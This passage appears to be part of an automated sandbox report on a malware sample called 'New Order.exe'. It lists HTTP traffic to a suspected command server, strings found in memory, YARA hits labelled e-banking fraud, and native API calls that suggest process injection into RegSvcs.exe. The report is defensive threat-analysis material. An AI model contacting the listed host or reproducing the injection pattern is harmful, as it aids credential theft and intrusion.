20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 37 39 34 35 36 32 31 37 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.79456217.xyz Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 10:59:17 GMTServer: ApacheContent-Length: 262Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 37 39 34 35 36 32 31 37 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.79456217.xyz Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 10:59:20 GMTServer: ApacheContent-Length: 262Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 37 39 34 35 36 32 31 37 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.79456217.xyz Port 80</address></body></html>
                Source: New Order.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: New Order.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: New Order.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: New Order.exe, 00000000.00000002.1285369631.0000000002713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 9WAxm5F77VClmSoGxi.exe, 0000000F.00000002.2432752238.000000000068E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.79456217.xyz
                Source: 9WAxm5F77VClmSoGxi.exe, 0000000F.00000002.2432752238.000000000068E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.79456217.xyz/q7ap/
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: PresentationHost.exe, 0000000E.00000002.2438416479.0000000004FB4000.00000004.10000000.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000F.00000002.2434352984.0000000002804000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1963615507.000000001EFD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: PresentationHost.exe, 0000000E.00000002.2438416479.000000000546A000.00000004.10000000.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000F.00000002.2434352984.0000000002CBA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: PresentationHost.exe, 0000000E.00000002.2432624467.00000000029C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: PresentationHost.exe, 0000000E.00000002.2432624467.00000000029C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: PresentationHost.exe, 0000000E.00000002.2432624467.00000000029C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: PresentationHost.exe, 0000000E.00000002.2432624467.00000000029C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: PresentationHost.exe, 0000000E.00000002.2432624467.00000000029F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: New Order.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2432752238.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1679205538.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1677471909.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2433546619.0000000004E40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1679654873.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: initial sampleStatic PE information: Filename: New Order.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0042CE83 NtClose,8_2_0042CE83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2B60 NtClose,LdrInitializeThunk,8_2_00FD2B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_00FD2C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_00FD2DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD35C0 NtCreateMutant,LdrInitializeThunk,8_2_00FD35C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD4340 NtSetContextThread,8_2_00FD4340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD4650 NtSuspendThread,8_2_00FD4650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2AF0 NtWriteFile,8_2_00FD2AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2AD0 NtReadFile,8_2_00FD2AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2AB0 NtWaitForSingleObject,8_2_00FD2AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2BF0 NtAllocateVirtualMemory,8_2_00FD2BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2BE0 NtQueryValueKey,8_2_00FD2BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2BA0 NtEnumerateValueKey,8_2_00FD2BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2B80 NtQueryInformationFile,8_2_00FD2B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2CF0 NtOpenProcess,8_2_00FD2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2CC0 NtQueryVirtualMemory,8_2_00FD2CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2CA0 NtQueryInformationToken,8_2_00FD2CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2C60 NtCreateKey,8_2_00FD2C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2C00 NtQueryInformationProcess,8_2_00FD2C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2DD0 NtDelayExecution,8_2_00FD2DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2DB0 NtEnumerateKey,8_2_00FD2DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2D30 NtUnmapViewOfSection,8_2_00FD2D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2D10 NtMapViewOfSection,8_2_00FD2D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2D00 NtSetInformationFile,8_2_00FD2D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2EE0 NtQueueApcThread,8_2_00FD2EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2EA0 NtAdjustPrivilegesToken,8_2_00FD2EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2E80 NtReadVirtualMemory,8_2_00FD2E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2E30 NtWriteVirtualMemory,8_2_00FD2E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2FE0 NtCreateFile,8_2_00FD2FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2FB0 NtResumeThread,8_2_00FD2FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2FA0 NtQuerySection,8_2_00FD2FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2F90 NtProtectVirtualMemory,8_2_00FD2F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2F60 NtCreateProcessEx,8_2_00FD2F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2F30 NtCreateSection,8_2_00FD2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD3090 NtSetValueKey,8_2_00FD3090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD3010 NtOpenDirectoryObject,8_2_00FD3010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD39B0 NtGetContextThread,8_2_00FD39B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD3D70 NtOpenThread,8_2_00FD3D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD3D10 NtOpenProcessToken,8_2_00FD3D10
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_02573E400_2_02573E40
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_0257D6FC0_2_0257D6FC
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_04C86B780_2_04C86B78
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_04C801200_2_04C80120
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_04C801300_2_04C80130
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_04C86B680_2_04C86B68
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_06D59B500_2_06D59B50
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_06D578A80_2_06D578A8
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_06D516180_2_06D51618
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_06D531170_2_06D53117
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_06D531280_2_06D53128
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_06D51E880_2_06D51E88
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_06D51A500_2_06D51A50
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_06D53B980_2_06D53B98
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_086721060_2_08672106
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_086734F80_2_086734F8
                Source: C:\Users\user\Desktop\New Order.exeCode function: 0_2_086753100_2_08675310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00418D538_2_00418D53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E8038_2_0040E803
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004011208_2_00401120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040421E8_2_0040421E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0042F4638_2_0042F463
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004024208_2_00402420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004104B38_2_004104B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004026C08_2_004026C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004106D38_2_004106D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004026F98_2_004026F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00402EB08_2_00402EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E6B38_2_0040E6B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00416F508_2_00416F50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00416F538_2_00416F53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040E7F98_2_0040E7F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103A1188_2_0103A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010281588_2_01028158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010541A28_2_010541A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010601AA8_2_010601AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010581CC8_2_010581CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010320008_2_01032000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F901008_2_00F90100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105A3528_2_0105A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010603E68_2_010603E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE3F08_2_00FAE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010402748_2_01040274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010202C08_2_010202C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010605918_2_01060591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010444208_2_01044420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010524468_2_01052446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA05358_2_00FA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104E4F68_2_0104E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBC6E08_2_00FBC6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9C7C08_2_00F9C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA07708_2_00FA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC47508_2_00FC4750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCE8F08_2_00FCE8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F868B88_2_00F868B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0106A9A68_2_0106A9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA28408_2_00FA2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAA8408_2_00FAA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29A08_2_00FA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB69628_2_00FB6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105AB408_2_0105AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9EA808_2_00F9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01056BD78_2_01056BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F90CF28_2_00F90CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103CD1F8_2_0103CD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0C008_2_00FA0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9ADE08_2_00F9ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB8DBF8_2_00FB8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01040CB58_2_01040CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAAD008_2_00FAAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01042F308_2_01042F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01014F408_2_01014F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2E908_2_00FB2E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101EFA08_2_0101EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0E598_2_00FA0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FACFE08_2_00FACFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105EE268_2_0105EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F92FC88_2_00F92FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105CE938_2_0105CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC0F308_2_00FC0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FE2F288_2_00FE2F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105EEDB8_2_0105EEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA70C08_2_00FA70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0106B16B8_2_0106B16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAB1B08_2_00FAB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8F1728_2_00F8F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD516C8_2_00FD516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104F0CC8_2_0104F0CC
